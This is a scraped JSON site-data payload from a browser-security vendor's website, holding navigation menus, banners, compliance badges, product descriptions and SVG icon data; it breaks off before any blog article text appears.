[{"data":1,"prerenderedAt":2116},["ShallowReactive",2],{"application-flags":3,"navbar":7,"always-visible-banner":35,"trust-badges":98,"solution-nav":119,"mega-nav":264,"fa-icon-solid-faDisplay":419,"fa-icon-solid-faFilter":422,"fa-icon-solid-faCloudArrowUp":424,"fa-icon-solid-faEnvelope":427,"fa-icon-sharp-regular-faUserSecret":429,"fa-icon-sharp-regular-faBrainCircuit":432,"fa-icon-sharp-regular-faShieldCheck":434,"fa-icon-sharp-regular-faRadar":436,"fa-icon-solid-faMobileScreenButton":438,"fa-icon-sharp-regular-faSatelliteDish":441,"fa-icon-brands-faChrome":443,"fa-icon-sharp-regular-faPenNib":445,"fa-icon-sharp-regular-faBooks":447,"fa-icon-sharp-regular-faBriefcase":449,"fa-icon-sharp-regular-faBookOpenCover":451,"fa-icon-sharp-regular-faBrowser":453,"fa-icon-sharp-regular-faBook":455,"fa-icon-sharp-regular-faGrid":457,"fa-icon-sharp-regular-faBuilding":459,"fa-icon-sharp-regular-faHandshakeSimple":461,"fa-icon-sharp-regular-faArrowTrendUp":463,"fa-icon-sharp-regular-faCalendarStar":465,"fa-icon-sharp-regular-faNewspaper":467,"fa-icon-sharp-regular-faUsers":469,"fa-icon-sharp-regular-faMessagesQuestion":471,"blog\u002Fadception-malvertising-another-search-engines-search-results":473,"blog-topics":1717},[4],{"name":5,"enabled":6},"maintenanceMode",false,[8],{"createdDate":9,"id":10,"name":11,"modelId":12,"published":13,"meta":14,"query":20,"data":21,"variations":26,"lastUpdated":27,"firstPublished":28,"testRatio":29,"createdBy":30,"lastUpdatedBy":31,"folders":32,"lastUpdateSource":33,"stageModifiedSincePublish":6,"rev":34},1742208588866,"1c7a4e423bf54ac1a328bb4063459ef2","Banner","1c6207a5f24948ab82d4a0b17f251193","published",{"breakpoints":15,"hasAutosaves":6,"hasErrors":6,"kind":19},{"medium":16,"small":17,"xsmall":18},768,640,320,"data",[],{"link":22,"text":23,"type":24,"url":25},{},"Get the latest stats and analysis on browser-based attacks","web-banner","https:\u002F\u002Fpushsecurity.com\u002Fresources\u002Fbrowser-attacks",{},1790775413052,1742208637545,1,"CydmZnOWU1XuAaLhEDCoYNM4Z8W2","jKjF9r5jcvXU8tzZEfFQm31Iyvr2",[],null,"2xch6g7yypc",{"createdBy":36,"createdDate":37,"data":38,"folders":86,"id":87,"lastUpdated":88,"lastUpdatedBy":36,"meta":89,"modelId":92,"name":93,"published":13,"query":94,"testRatio":29,"variations":95,"firstPublished":96,"stageModifiedSincePublish":6,"lastUpdateSource":33,"rev":97},"ST0tXQM8slWpFrmioqKHmENB2qe2",1774965361051,{"ctaText":39,"text":40,"url":41,"blocks":42,"state":82},"ewrererw","testrfesssssssssss","",[43,71],{"@type":44,"@version":45,"id":46,"component":47,"responsiveStyles":61},"@builder.io\u002Fsdk:Element",2,"builder-ca12c06a52de41d7b8743da53118cd38",{"name":48,"tag":48,"options":49,"isRSC":33},"TopBannerContent",{"text":50,"ctaText":51,"url":52,"mainText":53,"cta":56,"styleVariant":59,"showMonsters":60},"New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks","Save Your Spot","https:\u002F\u002Fpushsecurity.com\u002Fwebinar\u002Fstate-of-browser-security",{"content":54,"fontSize":55},"\u003Cp class=\"\">Shadow AI monsters are lurking in the dark! Bust them all in our retro-inspired arcade game.\u003C\u002Fp>","text-base",{"content":57,"fontSize":55,"url":58},"\u003Cp class=\"\">Press start &gt;&gt;\u003C\u002Fp>","https:\u002F\u002Fpushsecurity.com\u002Flp\u002Fshadow-ai-busters","arcade",true,{"large":62},{"display":63,"flexDirection":64,"position":65,"flexShrink":66,"boxSizing":67,"marginTop":68,"marginBottom":68,"fontSize":69,"fontWeight":70},"flex","column","relative","0","border-box",".56rem","1.125rem","700",{"id":72,"@type":44,"tagName":73,"properties":74,"responsiveStyles":77},"builder-pixel-z8at1ozq7r","img",{"src":75,"aria-hidden":76,"alt":41,"width":66,"height":66},"https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fpixel?apiKey=f3a1111ff5be48cdbb123cd9f5795a05","true",{"large":78},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},"block","hidden","none",{"deviceSize":83,"location":84},"large",{"path":41,"query":85},{},[],"fd266d0172cc47429be7ad10f48c99ad",1789552629325,{"breakpoints":90,"hasAutosaves":60,"hasErrors":6,"hasLinks":6,"kind":91},{"medium":16,"small":17,"xsmall":18},"component","0678d178ec8b41efb8a23c09dba7874d","always visible banner",[],{},1774968080803,"woiop4csqwc",[99,103,107,111,115],{"title":100,"logo":101,"createdDate":102},"SOC2","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb6727a5e00004d6e9e69fc3068b8b64c",1784291539953,{"title":104,"logo":105,"createdDate":106},"GDPR","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ffe49f53211674deaa5a6640d929cdf42?format=webp",1784291672535,{"title":108,"logo":109,"createdDate":110},"Cyber essentials","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F53558c1045a342a7a28def960cd54ae7?format=webp",1784291702710,{"title":112,"logo":113,"createdDate":114},"ISO IEC 27001","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F578a404a61cf45db951a41fe3554d12d",1784291766222,{"title":116,"logo":117,"createdDate":118},"ISO IEC 27701","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbe219844b13242fbba531959579a753c",1784291858848,[120,189,234],{"id":121,"label":122,"text":41,"navIcon":123,"items":124},"stop-browser-based-attacks","Stop browser-based attacks","solid:faShieldHalved",[125,130,135,140,145,150,155,160,165,169,174,179,184],{"title":126,"text":127,"url":128,"navIcon":129},"Phishing","Detect phishing behaviorally in the browser, regardless of the payload or delivery channel.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fzero-day-phishing","sharp-regular:faFishingRod",{"title":131,"text":132,"url":133,"navIcon":134},"Adversary-in-the-Middle","Detect and block MFA-bypassing AiTM phishing pages in real-time.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fadversary-in-the-middle-attacks","solid:faUserSecret",{"title":136,"text":137,"url":138,"navIcon":139},"ClickFix (and variants)","Intercept malicious copy and paste attacks at the point of interaction.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fclickfix-fix-variants","sharp-regular:faLaptopCode",{"title":141,"text":142,"url":143,"navIcon":144},"Device code phishing","Detect and block device code phishing kits designed to get around passkeys.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fdevice-code-phishing","solid:faTabletScreenButton",{"title":146,"text":147,"url":148,"navIcon":149},"Consent phishing","Detect and block malicious OAuth consent grants before access is authorized.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fconsent-phishing","solid:faThumbsUp",{"title":151,"text":152,"url":153,"navIcon":154},"Malicious OAuth integrations","Detect and block the root cause of SaaS supply chain attacks.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmalicious-oauth-integrations","solid:faPlugCircleXmark",{"title":156,"text":157,"url":158,"navIcon":159},"Malicious browser extensions","Inventory, monitor, and block risky browser extensions.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmalicious-browser-extensions","sharp-regular:faPuzzlePiece",{"title":161,"text":162,"url":163,"navIcon":164},"Malicious file downloads","Control which files users can download by type, source, and user group.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmalicious-file-downloads","solid:faFileCircleXmark",{"title":166,"text":167,"url":168,"navIcon":164},"Infostealers","Detect infostealer delivery and respond to a compromise.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Finfostealer-malware",{"title":170,"text":171,"url":172,"navIcon":173},"Ghost logins","Surface hidden login paths that bypass SSO and expose accounts.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fghost-logins","solid:faGhost",{"title":175,"text":176,"url":177,"navIcon":178},"Mobile phishing (QR & SMS)","Detect phishing regardless of whether it arrives via email, SMS, or QR code.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmobile-phishing-qr-code-sms","solid:faQrcode",{"title":180,"text":181,"url":182,"navIcon":183},"Credential stuffing","Identify reused and compromised credentials across SaaS logins.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fcredential-stuffing","custom:credentialStuffing",{"title":185,"text":186,"url":187,"navIcon":188},"Session hijacking","Detect and respond to stolen session token replay with browser session markers.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fsession-hijacking","solid:faCookieBite",{"id":190,"label":191,"text":41,"navIcon":192,"items":193},"achieve-security-outcomes","Achieve security outcomes","solid:faCheckToSlot",[194,199,204,209,214,219,224,229],{"title":195,"text":196,"url":197,"navIcon":198},"Stop account takeover","Stop ATO with stolen credential and compromised token detection","\u002Fsolution\u002Fachieve-security-outcomes\u002Fstop-account-takeover","sharp-regular:faUserSecret",{"title":200,"text":201,"url":202,"navIcon":203},"Harden unmanaged identities","Harden access paths with visibility, detection, and guardrails","\u002Fsolution\u002Fachieve-security-outcomes\u002Fharden-unmanaged-identities","sharp-regular:faRadar",{"title":205,"text":206,"url":207,"navIcon":208},"Investigate browser-related incidents","Investigate and respond faster with unique browser telemetry","\u002Fsolution\u002Fachieve-security-outcomes\u002Finvestigate-browser-related-incidents","sharp-regular:faSatelliteDish",{"title":210,"text":211,"url":212,"navIcon":213},"Secure shadow IT","See and control shadow SaaS in the browser","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-shadow-saas","sharp-regular:faShieldCheck",{"title":215,"text":216,"url":217,"navIcon":218},"Secure AI","See and control AI apps in the browser","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-ai","sharp-regular:faBrainCircuit",{"title":220,"text":221,"url":222,"navIcon":223},"Secure BYOD","Extend security to unmanaged devices without MDM","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-bring-your-own-device","solid:faMobileScreenButton",{"title":225,"text":226,"url":227,"navIcon":228},"Secure Chromebooks","Protect Chromebooks against in-browser attacks","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-chromebooks","brands:faChrome",{"title":230,"text":231,"url":232,"navIcon":233},"Data loss prevention","Enforce DLP at the point of interaction in the browser","\u002Fsolution\u002Fachieve-security-outcomes\u002Finvestigate-and-stop-data-loss","custom:investigateAndStopDataLoss",{"id":235,"label":236,"text":41,"navIcon":237,"items":238},"tool-replacements","Tool replacements","solid:faScrewdriverWrench",[239,244,249,254,259],{"title":240,"text":241,"url":242,"navIcon":243},"Email Security","Stop phishing outside of the inbox.","\u002Fsolution\u002Ftool-replacements\u002Femail-security","faEnvelope",{"title":245,"text":246,"url":247,"navIcon":248},"Remote browser isolation","Detect attacks that happen inside the browser session.","\u002Fsolution\u002Ftool-replacements\u002Fremote-browser-isolation","solid:faDisplay",{"title":250,"text":251,"url":252,"navIcon":253},"Secure web gateways","Detect attacks inside the browser after SWGs allowed the connection.","\u002Fsolution\u002Ftool-replacements\u002Fsecure-web-gateways","solid:faFilter",{"title":255,"text":256,"url":257,"navIcon":258},"CASB alternative","Catch browser-based identity threats in real time, not after the fact.","\u002Fsolution\u002Ftool-replacements\u002Fcloud-access-security-broker","solid:faCloudArrowUp",{"title":260,"text":261,"url":262,"navIcon":263},"Security awareness training","Block real phishing instead of training users on simulations.","\u002Fsolution\u002Ftool-replacements\u002Fsecurity-awareness-training","custom:securityAwareness",[265,293,354],{"id":266,"columns":267},"Solution",[268,283],{"kind":269,"heading":270,"span":29,"links":271},"links","Compare Push",[272,275,277,279,281],{"title":273,"url":247,"text":246,"navIcon":248,"variant":274},"vs Remote Browser Isolation","compact",{"title":276,"url":252,"text":251,"navIcon":253,"variant":274},"vs Secure Web Gateways",{"title":278,"url":257,"text":256,"navIcon":258,"variant":274},"vs Cloud Access Security Broker",{"title":280,"url":262,"text":261,"navIcon":263,"variant":274},"vs Security Awareness Training",{"title":282,"url":242,"text":241,"navIcon":243,"variant":274},"+ Email Security",{"kind":269,"heading":266,"span":45,"links":284},[285,286,287,288,289,290,291,292],{"title":195,"url":197,"text":196,"navIcon":198},{"title":215,"url":217,"text":216,"navIcon":218},{"title":230,"url":232,"text":231,"navIcon":233},{"title":210,"url":212,"text":211,"navIcon":213},{"title":200,"url":202,"text":201,"navIcon":203},{"title":220,"url":222,"text":221,"navIcon":223},{"title":205,"url":207,"text":206,"navIcon":208},{"title":225,"url":227,"text":226,"navIcon":228},{"id":294,"columns":295},"resources",[296,321,339],{"kind":269,"heading":297,"span":29,"links":298},"Resources",[299,306,311,316],{"title":300,"url":301,"text":302,"navIcon":303,"variant":304,"badge":305},"Research blog","\u002Fblog","Latest threat research and insights","sharp-regular:faPenNib","featured","Latest",{"title":307,"url":308,"text":309,"navIcon":310},"Resource library","\u002Fresources","Check out our webinars and downloads","sharp-regular:faBooks",{"title":312,"url":313,"text":314,"navIcon":315},"Customer stories","\u002Fcustomer-stories","What customers love about Push","sharp-regular:faBriefcase",{"title":317,"url":318,"text":319,"navIcon":320},"Help center","\u002Fhelp\u002Faudience\u002Fadministrators","Guides for employees and admins","sharp-regular:faBookOpenCover",{"kind":269,"heading":322,"span":29,"links":323},"Learn",[324,329,334],{"title":325,"url":326,"text":327,"navIcon":328},"Browser attacks in 2026","\u002Fresources\u002Fbrowser-attacks","The latest stats & analysis","sharp-regular:faBrowser",{"title":330,"url":331,"text":332,"navIcon":333},"Browser attacks glossary","\u002Fresources\u002Fbrowser-attacks-glossary","Understand the threat landscape","sharp-regular:faBook",{"title":335,"url":336,"text":337,"navIcon":338},"Browser attacks matrix","\u002Fresources\u002Fbrowser-identity-attacks-matrix","MITRE-inspired resource for red & blue teams","sharp-regular:faGrid",{"kind":294,"heading":340,"cards":341},"Latest resources",[342,348],{"title":343,"description":344,"cta":345,"background":347},"Browser-based attacks: the 2026 threat landscape","Half of attacks now reach victims outside of email. ClickFix is now the dominant browser attack technique. Get the latest stats and analysis from the Push Security team.",{"text":346,"url":326},"Read the report","orange",{"title":349,"description":350,"cta":351,"background":353},"The browser & identity attacks matrix","Check out the MITRE-inspired matrix of browser & identity attack techniques for red and blue teams. Get involved on GitHub.",{"text":352,"url":336},"Explore the matrix","black",{"id":355,"columns":356},"About",[357,375,398],{"kind":269,"heading":358,"span":29,"links":359},"Get to know us",[360,365,370],{"title":361,"url":362,"text":363,"navIcon":364},"About us","\u002Fabout","Meet the team and learn what drives us","sharp-regular:faBuilding",{"title":366,"url":367,"text":368,"navIcon":369},"Partners","\u002Fpartner","Become a partner and access resources","sharp-regular:faHandshakeSimple",{"title":371,"url":372,"text":373,"navIcon":374},"Investors","\u002Fabout#investors","Learn more about our investors and advisors","sharp-regular:faArrowTrendUp",{"kind":269,"heading":376,"span":29,"links":377},"Keep up with us",[378,383,388,393],{"title":379,"url":380,"text":381,"navIcon":382},"Events","\u002Fevents","See upcoming webinars and in-person events","sharp-regular:faCalendarStar",{"title":384,"url":385,"text":386,"navIcon":387},"News","\u002Fnews","Stay up to date on company news","sharp-regular:faNewspaper",{"title":389,"url":390,"text":391,"navIcon":392},"Careers","\u002Fcareers","Explore open roles","sharp-regular:faUsers",{"title":394,"url":395,"text":396,"navIcon":397},"Contact us","\u002Fcontact","Have a question? We're here to help","sharp-regular:faMessagesQuestion",{"kind":399,"heading":400,"testimonials":401},"testimonials","What customers say",[402,409,414],{"quote":403,"author":404,"jobTitle":405,"image":406,"url":313,"ctaText":407,"background":408},"Security is only as good as its weakest link. From day one, Push found the gaps that would allow attackers to circumvent our controls. We use Push every day — they're one of my favourite teams to work with.","Jason Waits","\u003Cp>CISO, Inductive Automation\u003C\u002Fp>","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ff04c0c0689ce4a89ac0f0708d78c0a07","Read the customer story","white",{"quote":410,"author":411,"jobTitle":412,"image":413,"url":313,"ctaText":407,"background":408},"I'm not going to be able to shove a browser on everybody. I need to be able to support them where they are. Push gave us the visibility and control we needed while allowing people to choose their paths.","Myke Lyons","\u003Cp>CISO, Cribl\u003C\u002Fp>","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F61920ec05c7a45b4b2259b8dded43c9b",{"quote":415,"author":416,"jobTitle":417,"image":418,"url":313,"ctaText":407,"background":408},"No matter the channel for phishing — email, LinkedIn, text — the employee clicks a link that opens a browser session. We see the main control point moving from the endpoint to the browser.","Ash Devata","\u003Cp>CEO, GreyNoise\u003C\u002Fp>","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F392c75ae282342008130cf1147c20e82",{"w":420,"h":420,"d":421},512,"M448 96l0 256-384 0 0-256 384 0zM64 32C28.7 32 0 60.7 0 96L0 352c0 35.3 28.7 64 64 64l144 0-16 48-72 0c-13.3 0-24 10.7-24 24s10.7 24 24 24l272 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-72 0-16-48 144 0c35.3 0 64-28.7 64-64l0-256c0-35.3-28.7-64-64-64L64 32z",{"w":420,"h":420,"d":423},"M32 64C19.1 64 7.4 71.8 2.4 83.8S.2 109.5 9.4 118.6L192 301.3 192 416c0 8.5 3.4 16.6 9.4 22.6l64 64c9.2 9.2 22.9 11.9 34.9 6.9S320 492.9 320 480l0-178.7 182.6-182.6c9.2-9.2 11.9-22.9 6.9-34.9S492.9 64 480 64L32 64z",{"w":425,"h":420,"d":426},576,"M144 480c-79.5 0-144-64.5-144-144 0-63.4 41-117.2 97.9-136.5-1.3-7.7-1.9-15.5-1.9-23.5 0-79.5 64.5-144 144-144 55.4 0 103.5 31.3 127.6 77.1 14.2-8.3 30.8-13.1 48.4-13.1 53 0 96 43 96 96 0 15.7-3.8 30.6-10.5 43.7 44 20.3 74.5 64.7 74.5 116.3 0 70.7-57.3 128-128 128l-304 0zM305 191c-9.4-9.4-24.6-9.4-33.9 0l-72 72c-9.4 9.4-9.4 24.6 0 33.9s24.6 9.4 33.9 0l31-31 0 102.1c0 13.3 10.7 24 24 24s24-10.7 24-24l0-102.1 31 31c9.4 9.4 24.6 9.4 33.9 0s9.4-24.6 0-33.9l-72-72z",{"w":420,"h":420,"d":428},"M48 64c-26.5 0-48 21.5-48 48 0 15.1 7.1 29.3 19.2 38.4l208 156c17.1 12.8 40.5 12.8 57.6 0l208-156c12.1-9.1 19.2-23.3 19.2-38.4 0-26.5-21.5-48-48-48L48 64zM0 196L0 384c0 35.3 28.7 64 64 64l384 0c35.3 0 64-28.7 64-64l0-188-198.4 148.8c-34.1 25.6-81.1 25.6-115.2 0L0 196z",{"w":430,"h":420,"d":431},448,"M144-16l-48 112-48 0 0 48 48 0 0 32c0 17 3.3 33.2 9.3 48l-73.3 0 0 32 5.3 16 26.7 80-64 160 51.7 0 56.9-142.2 6.5-16.3c-1-3.1-10.1-30.3-27.2-81.5l51.4 0c22.6 19.9 52.2 32 84.7 32s62.1-12.1 84.7-32l51.4 0c-17.1 51.2-26.1 78.4-27.2 81.5l6.5 16.3 56.9 142.2 51.7 0-64-160 26.7-80 5.3-16 0-32-73.3 0c6-14.8 9.3-31 9.3-48l0-32 48 0 0-48-48 0-48-112-32 0-48 32-48-32-32 0zm80 272c-32.8 0-61-19.7-73.3-48l57.3 0 16-40 16 40 57.3 0c-12.3 28.3-40.5 48-73.3 48zm17.5 139.6l30.5-35.6 0-24-96 0 0 24 30.5 35.6-46.5 116.4 128 0-46.5-116.4z",{"w":420,"h":420,"d":433},"M192 48l40 0 0 108-12.4 0c-7.6-16.5-24.3-28-43.6-28-26.5 0-48 21.5-48 48s21.5 48 48 48c19.4 0 36.1-11.5 43.6-28l12.4 0 0 56-92 0 0 56.4c-16.5 7.6-28 24.3-28 43.6 0 26.5 21.5 48 48 48s48-21.5 48-48c0-19.4-11.5-36.1-28-43.6l0-16.4 52 0 0 172-40 0c-16.8 0-31.2-10.3-37.1-25.1l-6.4-16-17.2 1c-1.1 .1-2.2 .1-3.2 .1-30.9 0-56-25.1-56-56 0-9.5 2.4-18.5 6.5-26.3l8.7-16.2-13.4-12.6c-11-10.2-17.8-24.8-17.8-40.9 0-21.6 12.2-40.4 30.3-49.8l22.6-11.7-13.1-21.9c-5-8.4-7.9-18.1-7.9-28.6 0-30.9 25.1-56 56-56l24 0 0-32c0-13.3 10.7-24 24-24zm88 148l12.4 0c7.6 16.5 24.3 28 43.6 28 26.5 0 48-21.5 48-48s-21.5-48-48-48c-19.4 0-36.1 11.5-43.6 28l-12.4 0 0-108 40 0c13.3 0 24 10.7 24 24l0 32 24 0c30.9 0 56 25.1 56 56 0 10.5-2.9 20.3-7.9 28.6l-13.1 21.9 22.6 11.7c18 9.3 30.3 28.1 30.3 49.8 0 16.1-6.8 30.7-17.8 40.9l-13.4 12.6 8.7 16.2c4.2 7.8 6.5 16.7 6.5 26.3 0 30.9-25.1 56-56 56-1.1 0-2.2 0-3.2-.1l-17.2-1-6.4 16C351.2 453.7 336.8 464 320 464l-40 0 0-76 92 0 0-56.4c16.5-7.6 28-24.3 28-43.6 0-26.5-21.5-48-48-48s-48 21.5-48 48c0 19.4 11.5 36.1 28 43.6l0 16.4-52 0 0-152zM192 512l128 0c31.1 0 58.4-16.2 74.1-40.5 52.7-5.1 93.9-49.5 93.9-103.5 0-11.5-1.9-22.5-5.3-32.9 13.4-17.5 21.3-39.4 21.3-63.1 0-32-14.5-60.6-37.1-79.7 3.3-10.2 5.1-21.1 5.1-32.3 0-49.6-34.8-91.1-81.3-101.5-6.3-33.3-35.6-58.5-70.7-58.5L192 0c-35.1 0-64.4 25.2-70.7 58.5-46.5 10.4-81.3 51.9-81.3 101.5 0 11.3 1.8 22.2 5.1 32.3-22.7 19.1-37.1 47.7-37.1 79.7 0 23.7 8 45.6 21.3 63.1-3.5 10.4-5.3 21.4-5.3 32.9 0 54 41.2 98.5 93.9 103.5 15.6 24.3 42.9 40.5 74.1 40.5zM336 192a16 16 0 1 1 0-32 16 16 0 1 1 0 32zm32 96a16 16 0 1 1 -32 0 16 16 0 1 1 32 0zM176 352a16 16 0 1 1 -32 0 16 16 0 1 1 32 0zm16-176a16 16 0 1 1 -32 0 16 16 0 1 1 32 0z",{"w":420,"h":420,"d":435},"M267.6 4.5l207.5 80.5 19.2 7.4 1.2 20.5c2.9 50-4.9 126.3-37.3 200.9-32.7 75.2-91.1 150-189.4 192.5l-12.7 5.5-12.7-5.5C144.9 463.9 86.6 389.2 53.9 313.9 21.5 239.3 13.7 162.9 16.6 113L17.8 92.5 37 85 244.5 4.5 256 0 267.6 4.5zM64.1 126C63.1 169.5 71 232.9 97.9 294.8 126.1 359.7 175 422.4 256 459.6 337.1 422.4 385.9 359.7 414.2 294.8 441 232.9 449 169.5 448 126L256 51.5 64.1 126zm302.3 44.7L352.3 190.1 249.8 330.9 233 354c-8.8-9.1-30.9-32-66.2-68.6l-16.7-17.3 34.5-33.3c9.5 9.8 23.9 24.7 43.2 44.7l85.6-117.7 14.1-19.4 38.8 28.2z",{"w":420,"h":420,"d":437},"M497.4 49l17-17-33.9-33.9C473.6 4.9 453.3 25.2 419.7 58.8 375.4 22.1 318.5 0 256.4 0 115.1 0 .4 114.6 .4 256s114.6 256 256 256 256-114.6 256-256l-48 0c0 114.9-93.1 208-208 208s-208-93.1-208-208 93.1-208 208-208c48.8 0 93.7 16.8 129.1 44.9l-45.7 45.7c-23.5-16.8-52.3-26.6-83.4-26.6-79.5 0-144 64.5-144 144s64.5 144 144 144 144-64.5 144-144l-48 0c0 53-43 96-96 96s-96-43-96-96 43-96 96-96c17.8 0 34.5 4.8 48.8 13.3-52 52-79.5 79.5-82.7 82.7l33.9 33.9 17-17 224-224z",{"w":439,"h":420,"d":440},384,"M16 64C16 28.7 44.7 0 80 0L304 0c35.3 0 64 28.7 64 64l0 384c0 35.3-28.7 64-64 64L80 512c-35.3 0-64-28.7-64-64L16 64zm64 0l0 304 224 0 0-304-224 0zM192 472c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32z",{"w":420,"h":420,"d":442},"M208 0l24 0C386.6 0 512 125.4 512 280l0 24-48 0 0-24C464 151.9 360.1 48 232 48l-24 0 0-48zm24 96c101.6 0 184 82.4 184 184l0 24-48 0 0-24c0-75.1-60.9-136-136-136l-24 0 0-48 24 0zM48 256c0 114.9 93.1 208 208 208 22.9 0 45-3.7 65.6-10.5l-263-263C51.7 211 48 233.1 48 256zM0 256c0-36.5 7.6-71.3 21.4-102.7 6.7-15.3 14.9-29.9 24.4-43.5 7.7 7.7 61.5 61.5 161.2 161.2 30.5-30.5 49.5-49.5 57-57L297.9 248c-7.5 7.5-26.5 26.5-57 57 99.7 99.7 153.5 153.5 161.2 161.2-13.6 9.5-28.2 17.7-43.5 24.4-31.4 13.8-66.2 21.4-102.7 21.4-141.4 0-256-114.6-256-256z",{"w":420,"h":420,"d":444},"M0 256c0-46.6 12.5-90.4 34.3-128.9L144.1 318.3c21.9 39.2 63.8 65.7 111.9 65.7 14.3 0 27.1-2.3 40.8-6.6L220.5 509.6C95.9 492.3 0 385.3 0 256zm365.1 65.6c12.3-19.2 18.9-42.5 18.9-65.6 0-38.2-16.8-72.5-43.3-96l152.7 0c12 29.6 18.6 62.1 18.6 96 0 141.4-114.6 255.1-256 256L365.1 321.6zM477.8 128L256 128c-62.9 0-113.7 44.1-125.5 102.7L54.2 98.5C101 38.5 174 0 256 0 350.8 0 433.5 51.5 477.8 128zM344 256a88 88 0 1 1 -176 0 88 88 0 1 1 176 0z",{"w":425,"h":420,"d":446},"M406.1 198.1l0 0-3.6 10.7-56.3 168.8-221.5 69.9 98.5-98.5c5.2 1.9 10.8 3 16.7 3 26.5 0 48-21.5 48-48s-21.5-48-48-48-48 21.5-48 48c0 5.9 1.1 11.5 3 16.7l-98.5 98.5 69.9-221.5 168.8-56.3 10.8-3.6 0 0 60.1 60.1zM80 512l304-96 64-192c59.4-59.4 96.7-96.7 112-112-18.3-18.3-49.6-49.6-94.1-94.1L432-16C416.7-.7 379.4 36.6 320 96l-192 64-96 304 48 48z",{"w":425,"h":420,"d":448},"M404.8 45.3l12.4 46.4-77.3 20.7-12.4-46.4 77.3-20.7zm5.5 329.8l-58-216.4 77.3-20.7 58 216.4-77.3 20.7zm12.4 46.4l77.3-20.7 12.4 46.4-77.3 20.7-12.4-46.4zM315.1 19.6l-46.4 12.4 8.6 32-69.2 0 0-64-176 0 0 512 304 0 0-228.4c41.8 156.2 63.5 237.1 65.1 243 64.4-17.3 167.4-44.9 170-45.6l-12.4-46.4-107.7-401.8-12.4-46.4C413-6.6 371.7 4.4 315.1 19.6zM208.1 464l0-352 80 0 0 352-80 0zm-48-400l0 32-80 0 0-48 80 0 0 16zm0 80l0 224-80 0 0-224 80 0zm0 272l0 48-80 0 0-48 80 0z",{"w":420,"h":420,"d":450},"M168 0l-24 0 0 96-144 0 0 384 512 0 0-384-144 0 0-96-200 0zM464 256l-416 0 0-112 416 0 0 112zM320 304l144 0 0 128-416 0 0-128 144 0 0 48 128 0 0-48zm0-208l-128 0 0-48 128 0 0 48z",{"w":425,"h":420,"d":452},"M312 114.4l0 282.1 9.2-3.3C367.8 376.5 417 368 466.5 368l61.5 0 0-288-61.5 0c-38.5 0-76.7 6.6-113 19.6L312 114.4zM264 396.5l0-282.1-41.5-14.8C186.2 86.6 148 80 109.5 80l-61.5 0 0 288 61.5 0c49.5 0 98.7 8.5 145.3 25.2l9.2 3.3zM528 32l48 0 0 384-109.5 0c-44 0-87.7 7.6-129.2 22.4L288 456 238.6 438.4C197.2 423.6 153.5 416 109.5 416L0 416 0 32 109.5 32c44 0 87.7 7.6 129.2 22.4L288 72 337.4 54.4C378.8 39.6 422.5 32 466.5 32L528 32zM0 464l91.7 0c36.9 0 73.6 5 109.2 14.9l86.2 24 42.2-15.1c44-15.7 90.5-23.8 137.2-23.8l109.5 0 0 48-109.5 0c-41.3 0-82.2 7.1-121.1 21l-49.4 17.6-7.2 2.6-7.3-2-93.6-26c-31.4-8.7-63.8-13.1-96.4-13.1L0 512 0 464z",{"w":420,"h":420,"d":454},"M48 256l0 144 416 0 0-144-416 0zM0 64l512 0 0 384-512 0 0-384zm64 64l0 64 64 0 0-64-64 0zm120 8l-24 0 0 48 288 0 0-48-264 0z",{"w":430,"h":420,"d":456},"M24 0L0 0 0 432 .4 432c-.2 2.6-.4 5.3-.4 8l0 72 448 0 0-48-32 0 0-64 32 0 0-400-424 0zM368 400l0 64-320 0 0-24c0-22.1 17.9-40 40-40l280 0zM88 352c-14.4 0-28 3.5-40 9.6l0-313.6 352 0 0 304-312 0zm40-224l0 48 224 0 0-48-224 0zm224 96l-224 0 0 48 224 0 0-48z",{"w":420,"h":420,"d":458},"M112 64l0 48-48 0 0-48 48 0zM64 24l-40 0 0 128 128 0 0-128-88 0zm48 208l0 48-48 0 0-48 48 0zM64 192l-40 0 0 128 128 0 0-128-88 0zm0 208l48 0 0 48-48 0 0-48zM24 360l0 128 128 0 0-128-128 0zM280 64l0 48-48 0 0-48 48 0zM232 24l-40 0 0 128 128 0 0-128-88 0zm0 208l48 0 0 48-48 0 0-48zm-40-40l0 